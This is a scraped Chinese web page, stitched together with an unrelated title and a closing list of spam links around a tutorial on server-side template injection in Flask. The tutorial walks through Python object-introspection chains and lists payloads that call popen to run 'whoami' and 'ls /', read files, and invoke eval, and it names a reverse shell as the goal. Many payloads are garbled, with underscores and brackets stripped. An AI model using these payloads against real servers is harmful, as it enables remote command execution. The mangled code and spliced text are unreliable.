当前位置: 首页 > news >正文

建筑工具网站wordpress图片文件夹更换

建筑工具网站,wordpress图片文件夹更换,成都网站建设工作室,长沙网站建设 鼎誉SSTI漏洞注入 SSTI全称Server side template injection.服务端模板注入这节课主要讲flask的模板注入.flask会把类似于 的变量当做参数来渲染并填充到web页面,如果该参数可控并被后台解析则有可能被注入恶意代码导致注入漏洞请注意 模板注入只会存在于二次渲染中,无二次渲染不会…

SSTI漏洞注入

SSTI全称Server side template injection.服务端模板注入这节课主要讲flask的模板注入.flask会把类似于 的变量当做参数来渲染并填充到web页面,如果该参数可控并被后台解析则有可能被注入恶意代码导致注入漏洞请注意 模板注入只会存在于二次渲染中,无二次渲染不会出现模板注入。

注入过程

  1. 确定模板类型
    在这里插入图片描述
  2. 利用魔术方法寻找可命令执行的子类
    魔术方法:
    class 返回类型所属的对象
    mro 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
    base 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的
    subclasses 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
    init 类的初始化方法
    globals 对包含函数全局变量的字典的引用
    寻找子类:
    Python3:
    使用file类读取文件的方法: <class ‘_frozen_importlib_external.FileLoader’>这个类索引号;
    利用os._warp_close类的 popen函数执行命令:
    [].class.mro[-1].subclasses()[128].init.globals’popen’.read()
    ().class.bases[0].subclasses()[128].init.globals[‘builtins’]‘import’.popen(‘whoami’).read()
    ().class.bases[0].subclasses()[128].init.globals[‘builtins’]‘eval’
    ().class.bases[0].subclasses()[128].init.globals[‘builtins’]‘eval’
    利用os._warp_close类的 open函数读取文件:
    ().class.bases[0].subclasses()[128].init.globals[‘builtins’]‘open’.read()
    Python2:
    利用 warnings.WarningMessage的 linecache执行命令:
    [].class.base.subclasses()[59].init.func_globals[‘linecache’].os.popen(‘whoami’).read()
    ().class.bases[0].subclasses()40.read()
    ().class.bases[0].subclasses()[75].init.globals[‘builtins’]‘eval’
    利用file类读取文件(python2特有):
    ().class.bases[0].subclasses()40.read()
    ().class.bases[0].subclasses()40.readlines()
    存在popen函数的类一般是 os._wrap_close
    [].class.mro[-1].subclasses()[128].init.globals[‘builtins’][‘eval’](‘import(“o”+“s”).popen(“ls /”).read()’)
    思路:找到父类<type ‘object’>–>寻找子类–>找关于命令执行或者文件操作的模块。
    几个含有eval函数的类:
    warnings.catch_warnings
    WarningMessage
    codecs.IncrementalEncoder
    codecs.IncrementalDecoder
    codecs.StreamReaderWriter
    os._wrap_close
    reprlib.Repr
    weakref.finalize
  3. 构造PAYLOAD执行反弹SHELL等命令
    相关链接
http://www.yayakq.cn/news/848386/

相关文章:

  • 郑州网站建设项目制作链接的小程序
  • 网站首页外链荆门网站建设 金键盘
  • 邹城网站建设zczwxx企业网站建设的征求意见
  • 昆山网站建设苦瓜网络昆明seo技术培训
  • 怎么制作网站教程电商杭州定制软件开发
  • 站酷网站源码网站建设与管理拼音
  • 网站上传用什么软件做视频格式哪些做调查问卷的网站
  • 李建忠 电子商务网站建设与管理 ppt承德平台
  • 大型大型网站建设53建筑人才网
  • 线上企业推广seo营销的策略有哪些
  • 可以免费打广告的网站做异形建筑的网站
  • 东莞做营销型网站的温州 做网站
  • 沈阳公司网站建设dwcc2018怎么做网站
  • 论述市场营销对网站设计的影响企业小程序注册
  • 做装修的业务网站做网站运营需要具备什么能力
  • 网站添加flv视频代码wordpress移动端m
  • 不买服务器做网站安徽seo优化
  • php网站开发 薪资 东莞惠州房产网
  • 网站名超链接怎么做热门搜索排行榜
  • 网站怎么做身份验证广州市花
  • 湖南建设部网站上海广告公司薪资
  • 代码做网站图片怎么插网站k
  • 个人或企业做网络贸易的主要网站网站建设结构总结
  • 西安做网站建设已备案网站想关闭
  • 网站建设与安全全球域名
  • 点击最多的网站景区网站建设策划方案
  • 做淘宝图的素材搜索网站保定网站模板建站
  • 2023免费网站推广全网营销和网络营销的区别
  • 怎么用思维导图做网站结构图湖南企业竞价优化公司
  • 小皮怎么创建网站九成seo